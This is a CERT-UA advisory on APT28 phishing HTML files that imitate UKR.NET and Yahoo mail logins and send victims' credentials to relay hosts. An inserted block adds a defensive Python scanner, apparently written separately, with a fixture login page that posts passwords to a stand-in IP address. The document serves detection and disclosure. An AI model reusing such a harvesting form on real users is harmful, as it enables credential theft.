Phishing attacks by the APT28 group (UAC-0028) to obtain authentication data for public mail services (CERT-UA#6975)

31.07.2023 16:10

The government computer emergency response team of Ukraine, CERT-UA, discovered HTML files that imitate the web interface of mail services (in particular, UKR.NET and Yahoo.com) and exfiltrate the authentication data entered by the victim using HTTP POST requests. The stolen data is relayed through previously compromised Ubiquiti devices (EdgeOS).
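The defensive check that follows from this description is to inspect any HTML attachment for a login form, or inline script, that sends data to a host unrelated to the brand the page imitates. The script below is an added example written for this note; it is not CERT-UA's code and it does not reproduce the files described above. It assumes a simple allowlist of the impersonated provider's domains, and the embedded attachment and the 203.0.113.10 address are constructed test data.

```python
"""Flag HTML attachments whose credential forms or scripts point at hosts
outside the imitated provider's domains (added example, constructed data)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Absolute http(s) URLs quoted inside inline scripts.
ABS_URL_RE = re.compile(r"""["'](https?://[^"'\s]+)["']""")


class LoginPageScanner(HTMLParser):
    """Collect form actions that carry a password field, plus absolute URLs
    appearing inside <script> blocks (where fetch/XHR posting would live)."""

    def __init__(self):
        super().__init__()
        self.forms = []        # [{"action": str, "has_password": bool}]
        self.script_urls = []  # absolute URLs found in inline scripts
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""), "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_urls.extend(ABS_URL_RE.findall(data))


def host_matches(host, expected_domains):
    """True if host is one of expected_domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in expected_domains)


def find_unexpected_targets(html, expected_domains):
    """Return [(where, url)] for each credential form action or script URL
    whose host is not under expected_domains. A local HTML attachment whose
    login form posts anywhere else is the pattern worth alerting on."""
    p = LoginPageScanner()
    p.feed(html)
    p.close()
    findings = []
    for f in p.forms:
        if not f["has_password"]:
            continue
        host = urlparse(f["action"]).hostname
        if host and not host_matches(host, expected_domains):
            findings.append(("form-action", f["action"]))
    for url in p.script_urls:
        host = urlparse(url).hostname
        if host and not host_matches(host, expected_domains):
            findings.append(("script-url", url))
    return findings


# Constructed fixture: a minimal page styled as a webmail login whose form
# posts to an address unrelated to the imitated provider (TEST-NET-3 range).
SAMPLE_ATTACHMENT = """<html><body>
<form method="POST" action="http://203.0.113.10/submit">
  <input name="login" type="text">
  <input name="password" type="password">
  <button>Sign in</button>
</form>
<script>
  var home = "https://mail.ukr.net/";
  new Image().src = "http://203.0.113.10/p.gif";
</script>
</body></html>"""

EXPECTED_DOMAINS = ["ukr.net"]  # domains the page claims to belong to

if __name__ == "__main__":
    for where, url in find_unexpected_targets(SAMPLE_ATTACHMENT, EXPECTED_DOMAINS):
        print(f"{where}: {url}")
```

Run it over quarantined attachments with the allowlist set to the provider whose branding the page shows; a hit on a bare IP address, as in the fixture, is exactly the kind of relay host the note describes.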

Particular attention should be paid to the fact that one of the HTML files ("detail.html", MD5: b0ef610dffa854e239fca9475f35272a) contains the email address of the target of the attack: "iri_1357@yahoo.com". According to available data, this address belongs to the Embassy of the Islamic Republic of Iran in Tirana (Republic of Albania).

Based on the above, it is reasonable to conclude that in May 2023 the APT28 group, whose activities are directed by the Russian Federation, among other things carried out a targeted cyber attack against a foreign diplomatic institution of Iran.

We would like to thank the representatives of the international research community (@cyber__sloth, @BushidoToken) who contribute to the fight against cyber threats directed, among other things, against Ukraine.
